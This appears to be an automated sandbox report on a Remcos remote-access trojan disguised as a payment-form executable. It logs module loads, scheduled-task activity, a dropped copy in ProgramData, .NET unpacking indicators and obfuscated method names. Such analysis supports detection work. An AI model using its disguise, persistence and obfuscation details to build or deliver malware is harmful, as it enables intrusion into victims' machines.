              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: winmm.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: urlmon.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: wininet.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: iertutil.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: srvcli.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: netutils.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: sspicli.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: mswsock.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: cryptsp.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: rsaenh.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: cryptbase.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: windows.storage.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: wldp.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: profapi.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: kernel.appcore.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: winhttp.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: iphlpapi.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: winnsi.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: dnsapi.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: rasadhlp.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: fwpuclnt.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: mscoree.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: kernel.appcore.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: version.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: uxtheme.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: windows.storage.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: wldp.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: profapi.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: cryptsp.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: rsaenh.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: cryptbase.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: dwrite.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: amsi.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: userenv.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: msasn1.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: gpapi.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: windowscodecs.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: propsys.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: edputil.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: urlmon.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: iertutil.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: srvcli.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: netutils.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: windows.staterepositoryps.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: sspicli.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: wintypes.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: appresolver.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: bcp47langs.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: slc.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: sppc.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: onecorecommonproxystub.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: onecoreuapcommonproxystub.dll
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: winmm.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: urlmon.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: wininet.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: iertutil.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: srvcli.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: netutils.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: kernel.appcore.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: mscoree.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: kernel.appcore.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: version.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: uxtheme.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: windows.storage.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: wldp.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: profapi.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: cryptsp.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: rsaenh.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: cryptbase.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: dwrite.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: amsi.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: userenv.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: msasn1.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: gpapi.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: windowscodecs.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: propsys.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: edputil.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: urlmon.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: iertutil.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: srvcli.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: netutils.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: windows.staterepositoryps.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: sspicli.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: wintypes.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: appresolver.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: bcp47langs.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: slc.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: sppc.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: onecorecommonproxystub.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: onecoreuapcommonproxystub.dll
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: winmm.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: urlmon.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: wininet.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: iertutil.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: srvcli.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: netutils.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: kernel.appcore.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: mscoree.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: kernel.appcore.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: version.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: uxtheme.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: windows.storage.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: wldp.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: profapi.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: cryptsp.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: rsaenh.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: cryptbase.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: dwrite.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: amsi.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: userenv.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: msasn1.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: gpapi.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: windowscodecs.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: propsys.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: edputil.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: urlmon.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: iertutil.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: srvcli.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: netutils.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: windows.staterepositoryps.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: sspicli.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: wintypes.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: appresolver.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: bcp47langs.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: slc.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: sppc.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: onecorecommonproxystub.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: onecoreuapcommonproxystub.dll
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: winmm.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: urlmon.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: wininet.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: iertutil.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: srvcli.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: netutils.dll
              Source: C:\ProgramData\AppUpdate\remcos.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: Payment Transfer Request Form.bat.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: Payment Transfer Request Form.bat.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
              Source: Payment Transfer Request Form.bat.exeStatic file information: File size 1243656 > 1048576
              Source: Payment Transfer Request Form.bat.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x129a00
              Source: Payment Transfer Request Form.bat.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

              Data Obfuscation

              barindex
              .NET source code contains potential unpacker
              Source: Payment Transfer Request Form.bat.exe, InnerForm.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
              Source: iKgKaogJ.exe.0.dr, InnerForm.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
              Source: 0.2.Payment Transfer Request Form.bat.exe.3959298.0.raw.unpack, yCV0BKZVRAKIRjaruc.cs.Net Code: TRNtTFepRA System.Reflection.Assembly.Load(byte[])
              Source: 0.2.Payment Transfer Request Form.bat.exe.6e30000.4.raw.unpack, yCV0BKZVRAKIRjaruc.cs.Net Code: TRNtTFepRA System.Reflection.Assembly.Load(byte[])
              Source: remcos.exe.9.dr, InnerForm.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 9_2_0041A8DA LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,9_2_0041A8DA
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 0_2_02604698 push edx; ret 0_2_0260469A
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 0_2_0260469B push edx; ret 0_2_0260469E
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 0_2_0260469F push edx; ret 0_2_026046A2
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 0_2_0260475B push ebp; ret 0_2_02604762
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 0_2_02604791 push esi; ret 0_2_02604792
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 0_2_0260DB84 pushfd ; ret 0_2_0260DB89
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 0_2_06A942D9 push ebx; ret 0_2_06A942DA
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 0_2_06A94E63 push es; ret 0_2_06A94E64
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 9_2_004000D8 push es; iretd 9_2_004000D9
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 9_2_0040008C push es; iretd 9_2_0040008D
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 9_2_004542E6 push ecx; ret 9_2_004542F9
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 9_2_0045B4FD push esi; ret 9_2_0045B506
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 9_2_00432BD6 push ecx; ret 9_2_00432BE9
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 9_2_00454C08 push eax; ret 9_2_00454C26
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exeCode function: 11_2_016BDB84 pushfd ; ret 11_2_016BDB89
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exeCode function: 11_2_075342D9 push ebx; ret 11_2_075342DA
              Source: C:\ProgramData\AppUpdate\remcos.exeCode function: 15_2_0141DB84 pushfd ; ret 15_2_0141DB89
              Source: C:\ProgramData\AppUpdate\remcos.exeCode function: 24_2_015ADB84 pushfd ; ret 24_2_015ADB89
              Source: C:\ProgramData\AppUpdate\remcos.exeCode function: 24_2_074C477B push edi; ret 24_2_074C4783
              Source: C:\ProgramData\AppUpdate\remcos.exeCode function: 24_2_074C272A push eax; ret 24_2_074C272B
              Source: C:\ProgramData\AppUpdate\remcos.exeCode function: 24_2_074C2620 push eax; ret 24_2_074C2621
              Source: C:\ProgramData\AppUpdate\remcos.exeCode function: 24_2_074C063E pushad ; ret 24_2_074C063F
              Source: C:\ProgramData\AppUpdate\remcos.exeCode function: 24_2_074C4694 push edx; ret 24_2_074C4695
              Source: C:\ProgramData\AppUpdate\remcos.exeCode function: 24_2_074C0575 push edx; ret 24_2_074C0576
              Source: C:\ProgramData\AppUpdate\remcos.exeCode function: 24_2_074C3509 push 48074B9Dh; ret 24_2_074C3515
              Source: C:\ProgramData\AppUpdate\remcos.exeCode function: 24_2_074C25DF push eax; ret 24_2_074C25E0
              Source: C:\ProgramData\AppUpdate\remcos.exeCode function: 24_2_074C8112 push esi; ret 24_2_074C8114
              Source: C:\ProgramData\AppUpdate\remcos.exeCode function: 24_2_074C81E4 push esi; ret 24_2_074C81EB
              Source: C:\ProgramData\AppUpdate\remcos.exeCode function: 24_2_074C3181 push edx; ret 24_2_074C3182
              Source: C:\ProgramData\AppUpdate\remcos.exeCode function: 24_2_074C7F66 push esi; ret 24_2_074C7F6D
              Source: C:\ProgramData\AppUpdate\remcos.exeCode function: 24_2_074C9F9D push edx; ret 24_2_074C9F9E
              Source: Payment Transfer Request Form.bat.exeStatic PE information: section name: .text entropy: 7.664561171360738
              Source: iKgKaogJ.exe.0.drStatic PE information: section name: .text entropy: 7.664561171360738
              Source: remcos.exe.9.drStatic PE information: section name: .text entropy: 7.664561171360738
              Source: 0.2.Payment Transfer Request Form.bat.exe.3959298.0.raw.unpack, G8mARHMuZR8FXfnmCS.csHigh entropy of concatenated method names: 'UhjH7mra5i', 'XY6HjYPDkV', 'PF6HMPTPVB', 'PnIHUKZk3P', 'YjHH0melV6', 'WrkHKCle1o', 'sOSHSxE2Ay', 'mn8HPByR6u', 'mnIHwZgHT8', 'BaqHEZJEmm'
              Source: 0.2.Payment Transfer Request Form.bat.exe.3959298.0.raw.unpack, QwhKlmmQbOGs1vhvh6.csHigh entropy of concatenated method names: 'CfliMWOhKg', 'w9UiUDG2tH', 'Ft2icQSo52', 'R2EiBvSMaI', 'JTLiDX0BLW', 'zu2iFCw2ph', 'cERiqd1hWw', 'UeLidOBibZ', 'IrdigGqCk0', 'kaciRRuIsY'
              Source: 0.2.Payment Transfer Request Form.bat.exe.3959298.0.raw.unpack, T5nHuxt62bFgjEPISG.csHigh entropy of concatenated method names: 'IjXpNwhKlm', 'sbOpZGs1vh', 'Vbbp3WaNw9', 'dYxpI3UyMs', 'YYdpH3XJCT', 'hVupuxxaXb', 'WDhyjeDnKZqFw5Nxgb', 'UTyMZYiwrtO9F1etxh', 'VFJppwL6hq', 'JrcpA7tFVX'
              Source: 0.2.Payment Transfer Request Form.bat.exe.3959298.0.raw.unpack, ytAJUOq4HRtVIxw1hb.csHigh entropy of concatenated method names: 'mHpCHhDhiK', 'eGAC9eOC0p', 'jXGCCsOrUl', 'SCLCL5Wpq2', 'GgZCnqdJY7', 'PV9ChNAlZb', 'Dispose', 'xEfsY6GYYd', 'LYYsiI6dlC', 'BYBsxtChcR'
              Source: 0.2.Payment Transfer Request Form.bat.exe.3959298.0.raw.unpack, yCV0BKZVRAKIRjaruc.csHigh entropy of concatenated method names: 'QIpAWe27sg', 'FuPAYYEfId', 'kNuAi7ECAD', 'LkaAx9juvZ', 'fadAONuKQG', 'jIgA28xoeJ', 'B0qANBD0D2', 'erZAZEhILB', 'oEjAv56Sng', 'QV5A3btiPj'
              Source: 0.2.Payment Transfer Request Form.bat.exe.3959298.0.raw.unpack, FLqfnnFPJGKibtN3dh.csHigh entropy of concatenated method names: 'Y4E9d0dE85', 'VTA9R2KG8I', 'F0Bsl0GkEh', 'zfnspfJt4p', 'JK99e7nLcY', 'VVo9jcK7ca', 'vJl9XsMxPy', 'WAR9MA0Ipw', 'AG69UpADh6', 'BAl9cfyrKE'
              Source: 0.2.Payment Transfer Request Form.bat.exe.3959298.0.raw.unpack, SyMs7Qb8mMgfKRYd3X.csHigh entropy of concatenated method names: 'iKjO69oqYs', 'AoxO1jWUWy', 'gQIxKUeM4B', 'CBFxSoAbnr', 'Vy1xPJ9uO0', 'PvpxwSGM8A', 'oADxET4bue', 'tHBxoSXc4W', 'O04xfCamDu', 'Xnax7yCGZW'
              Source: 0.2.Payment Transfer Request Form.bat.exe.3959298.0.raw.unpack, Q2ZkdhRylKQKsTs4XL.csHigh entropy of concatenated method names: 'yfxQxmyW92', 'idvQO32g4N', 'YW9Q2EEqqh', 'jfVQNkPo1b', 'OWcQCDmMOZ', 'K23QZvnAu5', 'Next', 'Next', 'Next', 'NextBytes'
              Source: 0.2.Payment Transfer Request Form.bat.exe.3959298.0.raw.unpack, Gj5cxnppjd4ARLaEyxk.csHigh entropy of concatenated method names: 'LDuQRsSvVy', 'oogQzMmo48', 'OtuLlfO3iy', 'TPwLpbxbK9', 'PI9L5iiFdZ', 'iayLA22uod', 'ELfLthwy4n', 'YaTLWHbihm', 'PKbLYuxLOW', 'H2OLiZI623'
              Source: 0.2.Payment Transfer Request Form.bat.exe.3959298.0.raw.unpack, sL1PZb5DGwDeE7Paan.csHigh entropy of concatenated method names: 'AWgTY7PLH', 'g8Kaupa9I', 'Ftn87PLKd', 'P9L1tKRBn', 'vXt4g5tI0', 'gy9b6gOwH', 'bM7NAbVyCE1i2xhafS', 'TsIBUoHnMYi64TXIUB', 'VNxskRIHc', 'XpuQw4aMX'
              Source: 0.2.Payment Transfer Request Form.bat.exe.3959298.0.raw.unpack, bjins3pl3hlyMvyiu1I.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'aEIQepphlQ', 'mU9Qj58lhs', 'y0NQXRapWc', 'KWiQMOTVDf', 'onLQUsal56', 'bjSQclOrDb', 'I1mQBG5w5x'
              Source: 0.2.Payment Transfer Request Form.bat.exe.3959298.0.raw.unpack, xCTOVurxxaXbvrBFwx.csHigh entropy of concatenated method names: 'vWd2W855I1', 'Wtr2iwe7yR', 'L4k2OKo9UO', 'zDx2NX7akf', 'wKN2ZZGGjH', 'Tc6ODvXyBP', 'IxtOFbROTd', 'zXuOq33Z0J', 'D3HOdSWvLP', 'rvMOglfgR9'
              Source: 0.2.Payment Transfer Request Form.bat.exe.3959298.0.raw.unpack, DoUWI7geeo4gsMWcTC.csHigh entropy of concatenated method names: 'siDCriUjgS', 'P8lC0SpHjg', 'V26CKfLBW6', 'eZtCSUnIK3', 'QnpCPvbNJ0', 'RnnCwjWTK4', 'rswCEIcFAU', 'CeZCoHDfxA', 'A8bCf0odHA', 'i2aC72Mua5'
              Source: 0.2.Payment Transfer Request Form.bat.exe.3959298.0.raw.unpack, xWxrRF4bbWaNw9tYx3.csHigh entropy of concatenated method names: 'HI8xabX1ct', 'kqsx8RyJ90', 'k5vxm6bWpF', 'GENx4DXHHV', 'nSmxHs7djY', 'qGuxuTgOBu', 'P1Xx9qYqsw', 'bfNxshgmBc', 'vIqxCjlZi4', 'PKixQCAWNR'
              Source: 0.2.Payment Transfer Request Form.bat.exe.3959298.0.raw.unpack, u0rhBJzJNPIkt5N8Be.csHigh entropy of concatenated method names: 'bhQQ8mDI5j', 'mDXQmiOJTZ', 'FykQ4ZLMc9', 'GpGQr6kNDA', 'lVlQ05eThQ', 'hOsQSW2MoQ', 'tjuQPremiu', 'SH7QhBykvY', 'v0pQJC1boc', 'hqBQyrL5Yg'
              Source: 0.2.Payment Transfer Request Form.bat.exe.3959298.0.raw.unpack, k92S0QfWqHPDXLhQIB.csHigh entropy of concatenated method names: 'VwrNJZ6G28', 'u7XNyFGXF2', 'CloNT2tfyQ', 'Yv7NaW5Z1u', 'J4FN6eXIDO', 'iZPN8qy1qo', 'KliN1072L4', 'iDyNmcr39k', 'mJUN4NhVk8', 'xB0NbeIVh9'
              Source: 0.2.Payment Transfer Request Form.bat.exe.3959298.0.raw.unpack, E9y7JUBhAG4VZB3dwW.csHigh entropy of concatenated method names: 'Bkh93isiBC', 'K7v9IoVLwH', 'ToString', 'Bqn9YwYoGF', 'ypR9i4n1EN', 'k7P9xJHMQh', 'Q2D9OfBov0', 'gOl92fuDC7', 'X6v9NTI1af', 'wYo9ZYosOt'
              Source: 0.2.Payment Transfer Request Form.bat.exe.3959298.0.raw.unpack, lVPoTvXllLOLRpP1BJ.csHigh entropy of concatenated method names: 'ur8VmQT5b6', 'xDMV4jQbBw', 'ISRVrfb1Ee', 'RXgV0pnskO', 'IgfVSierG5', 'EyJVPcKybC', 'OSZVE3TGQE', 'h4cVoZBpc0', 'pJEV7Dsa7A', 'XRlVesdraM'
              Source: 0.2.Payment Transfer Request Form.bat.exe.3959298.0.raw.unpack, l1OxmNEibSWnLqsK2U.csHigh entropy of concatenated method names: 'W92NYxpbaN', 'mi3NxqIRvs', 'j7UN2buWJe', 'Xc02RaN2jW', 'yv52zGpfA0', 'PgQNlfnKJW', 'YDcNpLDSr0', 'akAN5jJ4qy', 'sagNA3aAM4', 'eOHNtJvDkb'
              Source: 0.2.Payment Transfer Request Form.bat.exe.3959298.0.raw.unpack, vEj6LbpAJ87hLqXMKwF.csHigh entropy of concatenated method names: 'tg6LRpQrDw', 'fc8Lznk3Xi', 'JaDklfHF73', 'BBHtsqdvXsCQ54Nonku', 'UhFyVOdnpJ4W0UGlmxa', 'NkHtCvdzTMPkXm4X1jE'
